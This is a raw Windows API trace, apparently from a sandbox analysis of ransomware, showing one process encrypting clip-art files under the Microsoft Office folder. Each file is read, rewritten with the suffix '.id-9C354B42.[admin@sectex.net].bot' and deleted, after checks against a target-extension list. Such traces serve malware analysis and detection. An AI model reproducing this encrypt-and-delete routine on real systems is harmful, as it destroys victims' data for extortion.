	[0158.683] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105386.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0158.720] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105386.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105386.wmf")) returned 1
	[0158.725] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105386.WMF") returned 63
	[0158.725] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105386.WMF") returned 63
	[0158.725] lstrlenW (lpString=".doc") returned 4
	[0158.725] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.725] lstrlenW (lpString=".docx") returned 5
	[0158.725] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0158.725] lstrlenW (lpString=".pdf") returned 4
	[0158.726] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.726] lstrlenW (lpString=".xls") returned 4
	[0158.726] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.726] lstrlenW (lpString=".xlsx") returned 5
	[0158.726] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0158.726] lstrlenW (lpString=".ppt") returned 4
	[0158.726] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105386.WMF") returned 63
	[0158.726] lstrlenW (lpString=".zip") returned 4
	[0158.726] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.726] lstrlenW (lpString=".rar") returned 4
	[0158.726] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.726] lstrlenW (lpString=".bz2") returned 4
	[0158.726] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.726] lstrlenW (lpString=".7z") returned 3
	[0158.726] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105386.WMF") returned 63
	[0158.726] lstrlenW (lpString=".dbf") returned 4
	[0158.726] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105386.WMF") returned 63
	[0158.726] lstrlenW (lpString=".1cd") returned 4
	[0158.726] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105386.WMF") returned 63
	[0158.726] lstrlenW (lpString=".jpg") returned 4
	[0158.726] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105386.WMF") returned 63
	[0158.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105386.WMF") returned 63
	[0158.726] lstrlenW (lpString=".doc") returned 4
	[0158.726] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.727] lstrlenW (lpString=".docx") returned 5
	[0158.735] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0158.735] lstrlenW (lpString=".pdf") returned 4
	[0158.735] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.736] lstrlenW (lpString=".xls") returned 4
	[0158.736] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.736] lstrlenW (lpString=".xlsx") returned 5
	[0158.736] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0158.736] lstrlenW (lpString=".ppt") returned 4
	[0158.736] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105386.WMF") returned 63
	[0158.736] lstrlenW (lpString=".zip") returned 4
	[0158.736] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.736] lstrlenW (lpString=".rar") returned 4
	[0158.736] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.736] lstrlenW (lpString=".bz2") returned 4
	[0158.736] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.736] lstrlenW (lpString=".7z") returned 3
	[0158.736] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105386.WMF") returned 63
	[0158.736] lstrlenW (lpString=".dbf") returned 4
	[0158.736] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105386.WMF") returned 63
	[0158.736] lstrlenW (lpString=".1cd") returned 4
	[0158.736] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105386.WMF") returned 63
	[0158.736] lstrlenW (lpString=".jpg") returned 4
	[0158.736] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.736] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0158.736] lstrlenW (lpString="J0105390.WMF") returned 12
	[0158.736] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105390.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105390.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0158.751] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=4944) returned 1
	[0158.751] CloseHandle (hObject=0x1d8) returned 1
	[0158.751] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105390.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105390.wmf")) returned 0x20
	[0158.938] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105390.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105390.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0158.938] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105390.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105390.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0158.938] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.938] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.938] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105390.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105390.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0158.939] GetLastError () returned 0x0
	[0158.939] ReadFile (in: hFile=0x388, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x1350, lpOverlapped=0x0) returned 1
	[0158.963] WriteFile (in: hFile=0x1d8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x1360, lpOverlapped=0x0) returned 1
	[0158.964] ReadFile (in: hFile=0x388, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0158.964] WriteFile (in: hFile=0x1d8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0158.964] SetEndOfFile (hFile=0x1d8) returned 1
	[0158.964] CloseHandle (hObject=0x1d8) returned 1
	[0158.964] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.964] SetEndOfFile (hFile=0x388) returned 1
	[0158.966] CloseHandle (hObject=0x388) returned 1
	[0158.966] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105390.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0158.966] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105390.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105390.wmf")) returned 1
	[0158.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105390.WMF") returned 63
	[0158.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105390.WMF") returned 63
	[0158.967] lstrlenW (lpString=".doc") returned 4
	[0158.967] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.967] lstrlenW (lpString=".docx") returned 5
	[0158.967] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0158.967] lstrlenW (lpString=".pdf") returned 4
	[0158.967] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.967] lstrlenW (lpString=".xls") returned 4
	[0158.967] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.967] lstrlenW (lpString=".xlsx") returned 5
	[0158.967] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0158.967] lstrlenW (lpString=".ppt") returned 4
	[0158.967] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105390.WMF") returned 63
	[0158.967] lstrlenW (lpString=".zip") returned 4
	[0158.967] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.967] lstrlenW (lpString=".rar") returned 4
	[0158.967] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.968] lstrlenW (lpString=".bz2") returned 4
	[0158.968] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.968] lstrlenW (lpString=".7z") returned 3
	[0158.968] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105390.WMF") returned 63
	[0158.968] lstrlenW (lpString=".dbf") returned 4
	[0158.968] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105390.WMF") returned 63
	[0158.968] lstrlenW (lpString=".1cd") returned 4
	[0158.968] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105390.WMF") returned 63
	[0158.968] lstrlenW (lpString=".jpg") returned 4
	[0158.968] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105390.WMF") returned 63
	[0158.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105390.WMF") returned 63
	[0158.968] lstrlenW (lpString=".doc") returned 4
	[0158.968] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.968] lstrlenW (lpString=".docx") returned 5
	[0158.968] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0158.968] lstrlenW (lpString=".pdf") returned 4
	[0158.968] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.968] lstrlenW (lpString=".xls") returned 4
	[0158.968] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.968] lstrlenW (lpString=".xlsx") returned 5
	[0158.968] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0158.968] lstrlenW (lpString=".ppt") returned 4
	[0158.968] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105390.WMF") returned 63
	[0158.968] lstrlenW (lpString=".zip") returned 4
	[0158.968] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.969] lstrlenW (lpString=".rar") returned 4
	[0158.969] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.969] lstrlenW (lpString=".bz2") returned 4
	[0158.969] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.969] lstrlenW (lpString=".7z") returned 3
	[0158.969] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105390.WMF") returned 63
	[0158.969] lstrlenW (lpString=".dbf") returned 4
	[0158.969] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105390.WMF") returned 63
	[0158.969] lstrlenW (lpString=".1cd") returned 4
	[0158.969] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105390.WMF") returned 63
	[0158.969] lstrlenW (lpString=".jpg") returned 4
	[0158.969] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.969] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0158.969] lstrlenW (lpString="J0105410.WMF") returned 12
	[0158.969] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105410.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105410.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0158.987] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=20444) returned 1
	[0158.987] CloseHandle (hObject=0x3d0) returned 1
	[0158.987] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105410.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105410.wmf")) returned 0x20
	[0158.989] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105410.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105410.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0158.989] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105410.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105410.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0158.989] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.989] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.989] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105410.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105410.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0158.990] GetLastError () returned 0x0
	[0158.990] ReadFile (in: hFile=0x3d0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x4fdc, lpOverlapped=0x0) returned 1
	[0158.992] WriteFile (in: hFile=0x398, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x4fe0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x4fe0, lpOverlapped=0x0) returned 1
	[0158.993] ReadFile (in: hFile=0x3d0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0158.993] WriteFile (in: hFile=0x398, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0158.994] SetEndOfFile (hFile=0x398) returned 1
	[0158.994] CloseHandle (hObject=0x398) returned 1
	[0158.994] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.994] SetEndOfFile (hFile=0x3d0) returned 1
	[0158.996] CloseHandle (hObject=0x3d0) returned 1
	[0158.996] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105410.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0158.996] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105410.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105410.wmf")) returned 1
	[0158.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105410.WMF") returned 63
	[0158.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105410.WMF") returned 63
	[0158.997] lstrlenW (lpString=".doc") returned 4
	[0158.997] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.997] lstrlenW (lpString=".docx") returned 5
	[0158.997] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0158.997] lstrlenW (lpString=".pdf") returned 4
	[0158.997] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.997] lstrlenW (lpString=".xls") returned 4
	[0158.997] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.997] lstrlenW (lpString=".xlsx") returned 5
	[0158.997] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0158.997] lstrlenW (lpString=".ppt") returned 4
	[0158.997] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105410.WMF") returned 63
	[0158.998] lstrlenW (lpString=".zip") returned 4
	[0158.998] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.998] lstrlenW (lpString=".rar") returned 4
	[0158.998] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.998] lstrlenW (lpString=".bz2") returned 4
	[0158.998] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.998] lstrlenW (lpString=".7z") returned 3
	[0158.998] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105410.WMF") returned 63
	[0158.998] lstrlenW (lpString=".dbf") returned 4
	[0158.998] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105410.WMF") returned 63
	[0158.998] lstrlenW (lpString=".1cd") returned 4
	[0158.998] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105410.WMF") returned 63
	[0158.998] lstrlenW (lpString=".jpg") returned 4
	[0158.998] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105410.WMF") returned 63
	[0158.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105410.WMF") returned 63
	[0158.998] lstrlenW (lpString=".doc") returned 4
	[0158.998] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.998] lstrlenW (lpString=".docx") returned 5
	[0158.998] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0158.998] lstrlenW (lpString=".pdf") returned 4
	[0158.998] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.998] lstrlenW (lpString=".xls") returned 4
	[0158.998] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.998] lstrlenW (lpString=".xlsx") returned 5
	[0158.998] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0158.998] lstrlenW (lpString=".ppt") returned 4
	[0158.999] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105410.WMF") returned 63
	[0158.999] lstrlenW (lpString=".zip") returned 4
	[0158.999] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.999] lstrlenW (lpString=".rar") returned 4
	[0158.999] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.999] lstrlenW (lpString=".bz2") returned 4
	[0158.999] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.999] lstrlenW (lpString=".7z") returned 3
	[0158.999] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105410.WMF") returned 63
	[0158.999] lstrlenW (lpString=".dbf") returned 4
	[0158.999] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105410.WMF") returned 63
	[0158.999] lstrlenW (lpString=".1cd") returned 4
	[0158.999] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105410.WMF") returned 63
	[0158.999] lstrlenW (lpString=".jpg") returned 4
	[0158.999] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.999] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0158.999] lstrlenW (lpString="J0105412.WMF") returned 12
	[0158.999] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105412.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105412.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0159.000] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=9400) returned 1
	[0159.000] CloseHandle (hObject=0x3d0) returned 1
	[0159.000] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105412.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105412.wmf")) returned 0x20
	[0159.000] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105412.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105412.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.000] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105412.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105412.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0159.000] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.000] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.000] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105412.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105412.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0159.002] GetLastError () returned 0x0
	[0159.002] ReadFile (in: hFile=0x3d0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x24b8, lpOverlapped=0x0) returned 1
	[0159.032] WriteFile (in: hFile=0x398, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x24c0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x24c0, lpOverlapped=0x0) returned 1
	[0159.033] ReadFile (in: hFile=0x3d0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.033] WriteFile (in: hFile=0x398, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0159.033] SetEndOfFile (hFile=0x398) returned 1
	[0159.033] CloseHandle (hObject=0x398) returned 1
	[0159.034] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.034] SetEndOfFile (hFile=0x3d0) returned 1
	[0159.036] CloseHandle (hObject=0x3d0) returned 1
	[0159.036] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105412.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.036] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105412.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105412.wmf")) returned 1
